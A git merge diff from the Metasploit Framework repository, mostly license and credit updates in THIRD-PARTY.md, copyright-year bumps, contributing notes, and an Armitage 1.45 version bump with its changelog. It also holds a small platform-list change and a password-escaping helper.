Merge remote-tracking branch 'upstream/master' into web-modules
commit
e1885cab0b
|
@ -22,3 +22,4 @@ tags
|
|||
*.swp
|
||||
*.orig
|
||||
*.rej
|
||||
*~
|
||||
|
|
|
@ -12,6 +12,11 @@ If your bug is new and you'd like to report it you will need to
|
|||
first](https://dev.metasploit.com/redmine/account/register). Don't
|
||||
worry, it's easy and fun and takes about 30 seconds.
|
||||
|
||||
When you file a bug report, please inclue your **steps to reproduce**,
|
||||
full copy-pastes of Ruby stack traces, and any relevant details about
|
||||
your environment. Without repro steps, your bug will likely be closed.
|
||||
With repro steps, your bugs will likely be fixed.
|
||||
|
||||
## Contributing Metasploit Modules
|
||||
|
||||
If you have an exploit that you'd like to contribute to the Metasploit
|
||||
|
|
2
COPYING
2
COPYING
|
@ -1,4 +1,4 @@
|
|||
Copyright (C) 2006-2012, Rapid7 Inc.
|
||||
Copyright (C) 2006-2013, Rapid7 Inc.
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without modification,
|
||||
|
|
472
THIRD-PARTY.md
472
THIRD-PARTY.md
|
@ -18,13 +18,17 @@ Ruby
|
|||
Copyright (c) 2004 David R. Halliday
|
||||
- The Zip library located under lib/zip.
|
||||
Copyright (C) 2002-2004 Thomas Sondergaard
|
||||
- FastLib located at lib/fastlib.rb
|
||||
Copyright (C) 2011 Rapid7
|
||||
- Gem components located under lib/gemcache/
|
||||
* mime-types - Copyright (C) Austin Ziegler
|
||||
* rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers.
|
||||
Portions (c) 2007-2011 Eric Hodel. Portions copyright others, see individual
|
||||
files for details.
|
||||
* eventmachine - Copyright (C) 2006-07 by Francis Cianfrocca
|
||||
* json - Copyright Daniel Luz <dev at mernen dot com>
|
||||
* pg - Copyright (c) 1997-2012 by the authors
|
||||
* thin - Copyright (c) Marc-Andre Cournoyer
|
||||
|
||||
|
||||
|
||||
|
@ -85,42 +89,6 @@ Ruby
|
|||
|
||||
````
|
||||
|
||||
|
||||
PacketFu
|
||||
========
|
||||
- The PacketFu library located under lib/packetfu.
|
||||
Copyright (c) 2008-2012, Tod Beardsley
|
||||
|
||||
````
|
||||
Copyright (c) 2008-2012, Tod Beardsley
|
||||
All rights reserved.
|
||||
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright
|
||||
notice, this list of conditions and the following disclaimer in the
|
||||
documentation and/or other materials provided with the distribution.
|
||||
* Neither the name of Tod Beardsley nor the
|
||||
names of its contributors may be used to endorse or promote products
|
||||
derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
|
||||
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
|
||||
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
||||
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
||||
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
||||
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
````
|
||||
|
||||
|
||||
|
||||
GPL
|
||||
===
|
||||
- The modified TightVNC binaries and their associated source code.
|
||||
|
@ -1016,39 +984,55 @@ OpenSSL License
|
|||
|
||||
MIT
|
||||
===
|
||||
- The SSHKey library located under lib/sshkey.
|
||||
- The SSHKey library located under lib/sshkey/
|
||||
Copyright (c) 2011 James Miller
|
||||
- The Net::SSH library located under lib/net/ssh.
|
||||
- The Net::SSH library located under lib/net/ssh/
|
||||
Copyright (c) 2008 Jamis Buck <jamis@37signals.com>
|
||||
- Anemone located under lib/anemone
|
||||
- Anemone located under lib/anemone/
|
||||
Copyright (c) 2009 Vertive, Inc.
|
||||
- RKelly located under lib/rkelly/
|
||||
Copyright (c) 2007, 2008, 2009 Aaron Patterson, John Barnette
|
||||
- Gem components located under lib/gemcache
|
||||
- Gem components located under lib/gemcache/
|
||||
* actionmailer - Copyright (c) 2004-2011 David Heinemeier Hansson
|
||||
* actionpack - Copyright (c) 2004-2011 David Heinemeier Hansson
|
||||
* activemodel - Copyright (c) 2004-2011 David Heinemeier Hansson
|
||||
* activerecord - Copyright (c) 2004-2011 David Heinemeier Hansson
|
||||
* activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson
|
||||
* activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson
|
||||
* acts_as_list - Copyright (c) 2007 David Heinemeier Hansson
|
||||
* arel- Copyright (c) 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson
|
||||
* authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic
|
||||
* builder - Copyright (c) 2003-2012 Jim Weirich (jim.weirich@gmail.com)
|
||||
* carrierwave - Copyright (c) 2008-2012 Jonas Nicklas
|
||||
* chunky_png - Copyright (c) 2010 Willem van Bergen
|
||||
* coderay - By Rob Aldred
|
||||
* daemons - Copyright (c) 2005-2012 Thomas Uehlinger
|
||||
* diff-lcs - Copyright 2004–2011 Austin Ziegler
|
||||
* diff-lcs - Copyright 2004-2011 Austin Ziegler
|
||||
* erubis - copyright(c) 2006-2011 kuwata-lab.com all rights reserved.
|
||||
* formtastic - Copyright (c) 2008-2010 Justin French
|
||||
* fssm - Copyright (c) 2011 Travis Tilley
|
||||
* hike - Copyright (c) 2011 Sam Stephenson
|
||||
* i18n - Copyright (c) 2008 The Ruby I18n team
|
||||
* ice_cube - Copyright (c) 2010-2012 John Crepezzi
|
||||
* journey - Copyright (c) 2011 Aaron Patterson
|
||||
* jquery-rails - Copyright (c) 2010 Andre Arko
|
||||
* liquid - Copyright (c) 2005, 2006 Tobias Luetke
|
||||
* mail - Copyright (c) 2009, 2010, 2011, 2012 Mikel Lindsaar
|
||||
* metasploit_data_models - Copyright (c) 2012, Rapid7, Inc.
|
||||
* method_source - Copyright (c) 2011 John Mair (banisterfiend)
|
||||
* multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
|
||||
* nokogiri - Copyright (c) 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada
|
||||
* polyglot - Copyright (c) 2007 Clifford Heath
|
||||
* prototype_legacy_helper - No copyright statement provided (unmaintained per https://github.com/rails/prototype_legacy_helper)
|
||||
* rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen <purl.org/net/chneukirchen>
|
||||
* rack-cache - Copyright (c) 2008 Ryan Tomayko <http://tomayko.com/about>
|
||||
* rack-ssl - Copyright (c) 2010 Joshua Peek
|
||||
* rack-test - Copyright (c) 2008-2009 Bryan Helmkamp, Engine Yard Inc.
|
||||
* railties - No copyright statement provided
|
||||
* rake - Copyright (c) 2003, 2004 Jim Weirich
|
||||
* robots - Copyright (c) 2008 Kyle Maxwell, contributors
|
||||
* slop - Copyright (c) 2012 Lee Jarvis
|
||||
* spork - Copyright (c) 2009 Tim Harper
|
||||
* sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek
|
||||
* state_machine - Copyright (c) 2006-2012 Aaron Pfeifer
|
||||
* thor - Copyright (c) 2008 Yehuda Katz
|
||||
|
@ -1081,3 +1065,409 @@ WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
|||
|
||||
````
|
||||
|
||||
3-Clause BSD
|
||||
============
|
||||
- The PacketFu library located under lib/packetfu/
|
||||
Copyright (c) 2008-2012, Tod Beardsley
|
||||
- The Kiss FFT library located under external/ruby-kissfft/
|
||||
Copyright (c) 2003-2010 Mark Borgerding
|
||||
- The Kiss FFT wrapper layer, located under external/ruby-kissfft/
|
||||
Copyright (C) 2009-2012 H D Moore < hdm[at]rapid7.com >
|
||||
- Armitage, located under external/source/armitage and data/armitage/
|
||||
Copyright (C) 2010-2012 Raphael Mudge
|
||||
|
||||
````
|
||||
Redistribution and use in source and binary forms, with or without
|
||||
modification, are permitted provided that the following conditions are met:
|
||||
|
||||
* Redistributions of source code must retain the above copyright
|
||||
notice, this list of conditions and the following disclaimer.
|
||||
* Redistributions in binary form must reproduce the above copyright
|
||||
notice, this list of conditions and the following disclaimer in the
|
||||
documentation and/or other materials provided with the distribution.
|
||||
* Neither the name of Tod Beardsley nor the
|
||||
names of its contributors may be used to endorse or promote products
|
||||
derived from this software without specific prior written permission.
|
||||
|
||||
THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
|
||||
EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
|
||||
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
|
||||
DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
|
||||
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
||||
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
||||
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
||||
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
||||
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
||||
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
||||
````
|
||||
|
||||
|
||||
Artistic 2.0
|
||||
============
|
||||
|
||||
- Gem components located under lib/gemcache/
|
||||
* win32-api - Copyright (c) 2003-2011, Daniel J. Berger
|
||||
* win32-service - Copyright (c) 2003-2011, Daniel J. Berger
|
||||
* windows-api - Copyright (c) 2003-2011, Daniel J. Berger
|
||||
* windows-pr - Copyright (c) 2003-2011, Daniel J. Berger
|
||||
|
||||
````
|
||||
|
||||
Artistic License 2.0 Copyright (c) 2000-2006, The Perl Foundation.
|
||||
|
||||
Everyone is permitted to copy and distribute verbatim copies of this license
|
||||
document, but changing it is not allowed.
|
||||
|
||||
Preamble This license establishes the terms under which a given free software
|
||||
Package may be copied, modified, distributed, and/or redistributed. The intent
|
||||
is that the Copyright Holder maintains some artistic control over the
|
||||
development of that Package while still keeping the Package available as open
|
||||
source and free software.
|
||||
|
||||
You are always permitted to make arrangements wholly outside of this license
|
||||
directly with the Copyright Holder of a given Package. If the terms of this
|
||||
license do not permit the full use that you propose to make of the Package, you
|
||||
should contact the Copyright Holder and seek a different licensing arrangement.
|
||||
|
||||
Definitions "Copyright Holder" means the individual(s) or organization(s) named
|
||||
in the copyright notice for the entire Package.
|
||||
|
||||
"Contributor" means any party that has contributed code or other material to
|
||||
the Package, in accordance with the Copyright Holder's procedures.
|
||||
|
||||
"You" and "your" means any person who would like to copy, distribute, or modify
|
||||
the Package.
|
||||
|
||||
"Package" means the collection of files distributed by the Copyright Holder,
|
||||
and derivatives of that collection and/or of those files. A given Package may
|
||||
consist of either the Standard Version, or a Modified Version.
|
||||
|
||||
"Distribute" means providing a copy of the Package or making it accessible to
|
||||
anyone else, or in the case of a company or organization, to others outside of
|
||||
your company or organization.
|
||||
|
||||
"Distributor Fee" means any fee that you charge for Distributing this Package
|
||||
or providing support for this Package to another party. It does not mean
|
||||
licensing fees.
|
||||
|
||||
"Standard Version" refers to the Package if it has not been modified, or has
|
||||
been modified only in ways explicitly requested by the Copyright Holder.
|
||||
|
||||
"Modified Version" means the Package, if it has been changed, and such changes
|
||||
were not explicitly requested by the Copyright Holder.
|
||||
|
||||
"Original License" means this Artistic License as Distributed with the Standard
|
||||
Version of the Package, in its current version or as it may be modified by The
|
||||
Perl Foundation in the future.
|
||||
|
||||
"Source" form means the source code, documentation source, and configuration
|
||||
files for the Package.
|
||||
|
||||
"Compiled" form means the compiled bytecode, object code, binary, or any other
|
||||
form resulting from mechanical transformation or translation of the Source
|
||||
form.
|
||||
|
||||
Permission for Use and Modification Without Distribution (1) You are permitted
|
||||
to use the Standard Version and create and use Modified Versions for any
|
||||
purpose without restriction, provided that you do not Distribute the Modified
|
||||
Version.
|
||||
|
||||
Permissions for Redistribution of the Standard Version (2) You may Distribute
|
||||
verbatim copies of the Source form of the Standard Version of this Package in
|
||||
any medium without restriction, either gratis or for a Distributor Fee,
|
||||
provided that you duplicate all of the original copyright notices and
|
||||
associated disclaimers. At your discretion, such verbatim copies may or may not
|
||||
include a Compiled form of the Package.
|
||||
|
||||
(3) You may apply any bug fixes, portability changes, and other modifications
|
||||
made available from the Copyright Holder. The resulting Package will still be
|
||||
considered the Standard Version, and as such will be subject to the Original
|
||||
License.
|
||||
|
||||
Distribution of Modified Versions of the Package as Source (4) You may
|
||||
Distribute your Modified Version as Source (either gratis or for a Distributor
|
||||
Fee, and with or without a Compiled form of the Modified Version) provided that
|
||||
you clearly document how it differs from the Standard Version, including, but
|
||||
not limited to, documenting any non-standard features, executables, or modules,
|
||||
and provided that you do at least ONE of the following:
|
||||
|
||||
(a) make the Modified Version available to the Copyright Holder of the Standard
|
||||
Version, under the Original License, so that the Copyright Holder may include
|
||||
your modifications in the Standard Version. (b) ensure that installation of
|
||||
your Modified Version does not prevent the user installing or running the
|
||||
Standard Version. In addition, the Modified Version must bear a name that is
|
||||
different from the name of the Standard Version. (c) allow anyone who receives
|
||||
a copy of the Modified Version to make the Source form of the Modified Version
|
||||
available to others under (i) the Original License or (ii) a license that
|
||||
permits the licensee to freely copy, modify and redistribute the Modified
|
||||
Version using the same licensing terms that apply to the copy that the licensee
|
||||
received, and requires that the Source form of the Modified Version, and of any
|
||||
works derived from it, be made freely available in that license fees are
|
||||
prohibited but Distributor Fees are allowed.
|
||||
|
||||
Distribution of Compiled Forms of the Standard Version or Modified Versions
|
||||
without the Source (5) You may Distribute Compiled forms of the Standard
|
||||
Version without the Source, provided that you include complete instructions on
|
||||
how to get the Source of the Standard Version. Such instructions must be valid
|
||||
at the time of your distribution. If these instructions, at any time while you
|
||||
are carrying out such distribution, become invalid, you must provide new
|
||||
instructions on demand or cease further distribution. If you provide valid
|
||||
instructions or cease distribution within thirty days after you become aware
|
||||
that the instructions are invalid, then you do not forfeit any of your rights
|
||||
under this license.
|
||||
|
||||
(6) You may Distribute a Modified Version in Compiled form without the Source,
|
||||
provided that you comply with Section 4 with respect to the Source of the
|
||||
Modified Version.
|
||||
|
||||
Aggregating or Linking the Package (7) You may aggregate the Package (either
|
||||
the Standard Version or Modified Version) with other packages and Distribute
|
||||
the resulting aggregation provided that you do not charge a licensing fee for
|
||||
the Package. Distributor Fees are permitted, and licensing fees for other
|
||||
components in the aggregation are permitted. The terms of this license apply to
|
||||
the use and Distribution of the Standard or Modified Versions as included in
|
||||
the aggregation.
|
||||
|
||||
(8) You are permitted to link Modified and Standard Versions with other works,
|
||||
to embed the Package in a larger work of your own, or to build stand-alone
|
||||
binary or bytecode versions of applications that include the Package, and
|
||||
Distribute the result without restriction, provided the result does not expose
|
||||
a direct interface to the Package.
|
||||
|
||||
Items That are Not Considered Part of a Modified Version (9) Works (including,
|
||||
but not limited to, modules and scripts) that merely extend or make use of the
|
||||
Package, do not, by themselves, cause the Package to be a Modified Version. In
|
||||
addition, such works are not considered parts of the Package itself, and are
|
||||
not subject to the terms of this license.
|
||||
|
||||
General Provisions (10) Any use, modification, and distribution of the Standard
|
||||
or Modified Versions is governed by this Artistic License. By using, modifying
|
||||
or distributing the Package, you accept this license. Do not use, modify, or
|
||||
distribute the Package, if you do not accept this license.
|
||||
|
||||
(11) If your Modified Version has been derived from a Modified Version made by
|
||||
someone other than you, you are nevertheless required to ensure that your
|
||||
Modified Version complies with the requirements of this license.
|
||||
|
||||
(12) This license does not grant you the right to use any trademark, service
|
||||
mark, tradename, or logo of the Copyright Holder.
|
||||
|
||||
(13) This license includes the non-exclusive, worldwide, free-of-charge patent
|
||||
license to make, have made, use, offer to sell, sell, import and otherwise
|
||||
transfer the Package with respect to any patent claims licensable by the
|
||||
Copyright Holder that are necessarily infringed by the Package. If you
|
||||
institute patent litigation (including a cross-claim or counterclaim) against
|
||||
any party alleging that the Package constitutes direct or contributory patent
|
||||
infringement, then this Artistic License to you shall terminate on the date
|
||||
that such litigation is filed.
|
||||
|
||||
(14) Disclaimer of Warranty: THE PACKAGE IS PROVIDED BY THE COPYRIGHT HOLDER
|
||||
AND CONTRIBUTORS "AS IS' AND WITHOUT ANY EXPRESS OR IMPLIED WARRANTIES. THE
|
||||
IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, OR
|
||||
NON-INFRINGEMENT ARE DISCLAIMED TO THE EXTENT PERMITTED BY YOUR LOCAL LAW.
|
||||
UNLESS REQUIRED BY LAW, NO COPYRIGHT HOLDER OR CONTRIBUTOR WILL BE LIABLE FOR
|
||||
ANY DIRECT, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING IN ANY WAY
|
||||
OUT OF THE USE OF THE PACKAGE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH
|
||||
DAMAGE.
|
||||
|
||||
````
|
||||
|
||||
Apache 2.0
|
||||
==========
|
||||
|
||||
- Gem components located under lib/gemcache/
|
||||
* Msgpack - Copyright (c) 2008-2010 FURUHASHI Sadayuki
|
||||
|
||||
````
|
||||
|
||||
Apache License
|
||||
Version 2.0, January 2004
|
||||
http://www.apache.org/licenses/
|
||||
|
||||
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
||||
|
||||
1. Definitions.
|
||||
|
||||
"License" shall mean the terms and conditions for use, reproduction, and
|
||||
distribution as defined by Sections 1 through 9 of this document.
|
||||
|
||||
"Licensor" shall mean the copyright owner or entity authorized by the copyright
|
||||
owner that is granting the License.
|
||||
|
||||
"Legal Entity" shall mean the union of the acting entity and all other entities
|
||||
that control, are controlled by, or are under common control with that entity.
|
||||
For the purposes of this definition, "control" means (i) the power, direct or
|
||||
indirect, to cause the direction or management of such entity, whether by
|
||||
contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
||||
outstanding shares, or (iii) beneficial ownership of such entity.
|
||||
|
||||
"You" (or "Your") shall mean an individual or Legal Entity exercising
|
||||
permissions granted by this License.
|
||||
|
||||
"Source" form shall mean the preferred form for making modifications, including
|
||||
but not limited to software source code, documentation source, and
|
||||
configuration files.
|
||||
|
||||
"Object" form shall mean any form resulting from mechanical transformation or
|
||||
translation of a Source form, including but not limited to compiled object
|
||||
code, generated documentation, and conversions to other media types.
|
||||
|
||||
"Work" shall mean the work of authorship, whether in Source or Object form,
|
||||
made available under the License, as indicated by a copyright notice that is
|
||||
included in or attached to the work (an example is provided in the Appendix
|
||||
below).
|
||||
|
||||
"Derivative Works" shall mean any work, whether in Source or Object form, that
|
||||
is based on (or derived from) the Work and for which the editorial revisions,
|
||||
annotations, elaborations, or other modifications represent, as a whole, an
|
||||
original work of authorship. For the purposes of this License, Derivative Works
|
||||
shall not include works that remain separable from, or merely link (or bind by
|
||||
name) to the interfaces of, the Work and Derivative Works thereof.
|
||||
|
||||
"Contribution" shall mean any work of authorship, including the original
|
||||
version of the Work and any modifications or additions to that Work or
|
||||
Derivative Works thereof, that is intentionally submitted to Licensor for
|
||||
inclusion in the Work by the copyright owner or by an individual or Legal
|
||||
Entity authorized to submit on behalf of the copyright owner. For the purposes
|
||||
of this definition, "submitted" means any form of electronic, verbal, or
|
||||
written communication sent to the Licensor or its representatives, including
|
||||
but not limited to communication on electronic mailing lists, source code
|
||||
control systems, and issue tracking systems that are managed by, or on behalf
|
||||
of, the Licensor for the purpose of discussing and improving the Work, but
|
||||
excluding communication that is conspicuously marked or otherwise designated in
|
||||
writing by the copyright owner as "Not a Contribution."
|
||||
|
||||
"Contributor" shall mean Licensor and any individual or Legal Entity on behalf
|
||||
of whom a Contribution has been received by Licensor and subsequently
|
||||
incorporated within the Work.
|
||||
|
||||
2. Grant of Copyright License.
|
||||
|
||||
Subject to the terms and conditions of this License, each Contributor hereby
|
||||
grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,
|
||||
irrevocable copyright license to reproduce, prepare Derivative Works of,
|
||||
publicly display, publicly perform, sublicense, and distribute the Work and
|
||||
such Derivative Works in Source or Object form.
|
||||
|
||||
3. Grant of Patent License.
|
||||
|
||||
Subject to the terms and conditions of this License, each Contributor hereby
|
||||
grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free,
|
||||
irrevocable (except as stated in this section) patent license to make, have
|
||||
made, use, offer to sell, sell, import, and otherwise transfer the Work, where
|
||||
such license applies only to those patent claims licensable by such Contributor
|
||||
that are necessarily infringed by their Contribution(s) alone or by combination
|
||||
of their Contribution(s) with the Work to which such Contribution(s) was
|
||||
submitted. If You institute patent litigation against any entity (including a
|
||||
cross-claim or counterclaim in a lawsuit) alleging that the Work or a
|
||||
Contribution incorporated within the Work constitutes direct or contributory
|
||||
patent infringement, then any patent licenses granted to You under this License
|
||||
for that Work shall terminate as of the date such litigation is filed.
|
||||
|
||||
4. Redistribution.
|
||||
|
||||
You may reproduce and distribute copies of the Work or Derivative Works thereof
|
||||
in any medium, with or without modifications, and in Source or Object form,
|
||||
provided that You meet the following conditions:
|
||||
|
||||
You must give any other recipients of the Work or Derivative Works a copy of
|
||||
this License; and You must cause any modified files to carry prominent notices
|
||||
stating that You changed the files; and You must retain, in the Source form of
|
||||
any Derivative Works that You distribute, all copyright, patent, trademark, and
|
||||
attribution notices from the Source form of the Work, excluding those notices
|
||||
that do not pertain to any part of the Derivative Works; and If the Work
|
||||
includes a "NOTICE" text file as part of its distribution, then any Derivative
|
||||
Works that You distribute must include a readable copy of the attribution
|
||||
notices contained within such NOTICE file, excluding those notices that do not
|
||||
pertain to any part of the Derivative Works, in at least one of the following
|
||||
places: within a NOTICE text file distributed as part of the Derivative Works;
|
||||
within the Source form or documentation, if provided along with the Derivative
|
||||
Works; or, within a display generated by the Derivative Works, if and wherever
|
||||
such third-party notices normally appear. The contents of the NOTICE file are
|
||||
for informational purposes only and do not modify the License. You may add Your
|
||||
own attribution notices within Derivative Works that You distribute, alongside
|
||||
or as an addendum to the NOTICE text from the Work, provided that such
|
||||
additional attribution notices cannot be construed as modifying the License.
|
||||
You may add Your own copyright statement to Your modifications and may provide
|
||||
additional or different license terms and conditions for use, reproduction, or
|
||||
distribution of Your modifications, or for any such Derivative Works as a
|
||||
whole, provided Your use, reproduction, and distribution of the Work otherwise
|
||||
complies with the conditions stated in this License.
|
||||
|
||||
5. Submission of Contributions.
|
||||
|
||||
Unless You explicitly state otherwise, any Contribution intentionally submitted
|
||||
for inclusion in the Work by You to the Licensor shall be under the terms and
|
||||
conditions of this License, without any additional terms or conditions.
|
||||
Notwithstanding the above, nothing herein shall supersede or modify the terms
|
||||
of any separate license agreement you may have executed with Licensor regarding
|
||||
such Contributions.
|
||||
|
||||
6. Trademarks.
|
||||
|
||||
This License does not grant permission to use the trade names, trademarks,
|
||||
service marks, or product names of the Licensor, except as required for
|
||||
reasonable and customary use in describing the origin of the Work and
|
||||
reproducing the content of the NOTICE file.
|
||||
|
||||
7. Disclaimer of Warranty.
|
||||
|
||||
Unless required by applicable law or agreed to in writing, Licensor provides
|
||||
the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS,
|
||||
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied,
|
||||
including, without limitation, any warranties or conditions of TITLE,
|
||||
NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are
|
||||
solely responsible for determining the appropriateness of using or
|
||||
redistributing the Work and assume any risks associated with Your exercise of
|
||||
permissions under this License.
|
||||
|
||||
8. Limitation of Liability.
|
||||
|
||||
In no event and under no legal theory, whether in tort (including negligence),
|
||||
contract, or otherwise, unless required by applicable law (such as deliberate
|
||||
and grossly negligent acts) or agreed to in writing, shall any Contributor be
|
||||
liable to You for damages, including any direct, indirect, special, incidental,
|
||||
or consequential damages of any character arising as a result of this License
|
||||
or out of the use or inability to use the Work (including but not limited to
|
||||
damages for loss of goodwill, work stoppage, computer failure or malfunction,
|
||||
or any and all other commercial damages or losses), even if such Contributor
|
||||
has been advised of the possibility of such damages.
|
||||
|
||||
9. Accepting Warranty or Additional Liability.
|
||||
|
||||
While redistributing the Work or Derivative Works thereof, You may choose to
|
||||
offer, and charge a fee for, acceptance of support, warranty, indemnity, or
|
||||
other liability obligations and/or rights consistent with this License.
|
||||
However, in accepting such obligations, You may act only on Your own behalf and
|
||||
on Your sole responsibility, not on behalf of any other Contributor, and only
|
||||
if You agree to indemnify, defend, and hold each Contributor harmless for any
|
||||
liability incurred by, or claims asserted against, such Contributor by reason
|
||||
of your accepting any such warranty or additional liability.
|
||||
|
||||
END OF TERMS AND CONDITIONS
|
||||
|
||||
APPENDIX: How to apply the Apache License to your work
|
||||
|
||||
To apply the Apache License to your work, attach the following boilerplate
|
||||
notice, with the fields enclosed by brackets "[]" replaced with your own
|
||||
identifying information. (Don't include the brackets!) The text should be
|
||||
enclosed in the appropriate comment syntax for the file format. We also
|
||||
recommend that a file or class name and description of purpose be included on
|
||||
the same "printed page" as the copyright notice for easier identification
|
||||
within third-party archives.
|
||||
|
||||
Copyright [yyyy] [name of copyright owner]
|
||||
|
||||
Licensed under the Apache License, Version 2.0 (the "License"); you may not
|
||||
use this file except in compliance with the License. You may obtain a copy of
|
||||
the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing, software
|
||||
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
|
||||
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
|
||||
License for the specific language governing permissions and limitations under
|
||||
the License.
|
||||
|
||||
````
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first.
|
|||
7. License
|
||||
-------
|
||||
|
||||
(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license.
|
||||
(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license.
|
||||
See section 8 for more information.
|
||||
|
||||
lib/jgraphx.jar is used here within the terms of the BSD license offered by
|
||||
|
|
|
@ -1,6 +1,24 @@
|
|||
Armitage Changelog
|
||||
==================
|
||||
|
||||
4 Jan 13 (tested against msf 16252)
|
||||
--------
|
||||
- Added a helper to set REXE option
|
||||
- Added an icon to represent Windows 8
|
||||
- [host] -> Login menu is now built using open services for all
|
||||
highlighted hosts, not just the first one.
|
||||
- [host] -> Login items now escape punctuation characters in passwords
|
||||
before passing them to a framework module.
|
||||
- Added the windows and linux postgres_payload exploits to the use a
|
||||
reverse payload by default list.
|
||||
- Small tweak to allow Armitage to work with Metasploit 4.5 installed
|
||||
environment on Windows.
|
||||
|
||||
Cortana Updates (for scripters)
|
||||
--------
|
||||
- &credential_add and &credential_delete no longer break when a
|
||||
password has creative punctuation in it.
|
||||
|
||||
26 Nov 12 (tested against msf 16114)
|
||||
---------
|
||||
- Windows command shell tab is now friendlier to commands that prompt
|
||||
|
|
|
@ -9,7 +9,9 @@ puts "\n[*] Running checks for netifaces code added by metasploit project"
|
|||
puts "-----------------------------------------------------------------"
|
||||
#uncoment to force ioctl on non windows systems
|
||||
#@force_ioctl = true
|
||||
@supported_archs = ["i386-mingw32", "i486-linux", "universal-darwin10.0", "i386-openbsd4.8","i386-freebsd8","arm-linux-eabi"]
|
||||
@supported_archs = [ "i386-mingw32", "i486-linux", "x86_64-linux",
|
||||
"universal-darwin10.0", "i386-openbsd4.8", "i386-freebsd8",
|
||||
"arm-linux-eabi" ]
|
||||
#arm-linux-eabi tested on maemo5 / N900
|
||||
puts "[*] Warning : this platform as not been tested" unless @supported_archs.include? RUBY_PLATFORM
|
||||
|
||||
|
|
|
@ -60,7 +60,7 @@ sure you peruse the FAQ and Manual first.
|
|||
7. License
|
||||
-------
|
||||
|
||||
(c) 2010-2012 Raphael Mudge. This project is licensed under the BSD license.
|
||||
(c) 2010-2013 Raphael Mudge. This project is licensed under the BSD license.
|
||||
See section 8 for more information.
|
||||
|
||||
lib/jgraphx.jar is used here within the terms of the BSD license offered by
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
<html>
|
||||
<body>
|
||||
<center><h1>Armitage 1.44</h1></center>
|
||||
<center><h1>Armitage 1.45</h1></center>
|
||||
|
||||
<p>An attack management tool for Metasploit®
|
||||
<br />Release: 26 Nov 12</p>
|
||||
<br />Release: 4 Jan 13</p>
|
||||
<br />
|
||||
<p>Developed by:</p>
|
||||
|
||||
|
|
Binary file not shown.
After Width: | Height: | Size: 5.4 KiB |
|
@ -243,14 +243,18 @@ sub session_exploit {
|
|||
# credentials API
|
||||
#
|
||||
|
||||
sub _fix_pass {
|
||||
return replace(strrep($1, '\\', '\\\\'), '(\p{Punct})', '\\\\$1');
|
||||
}
|
||||
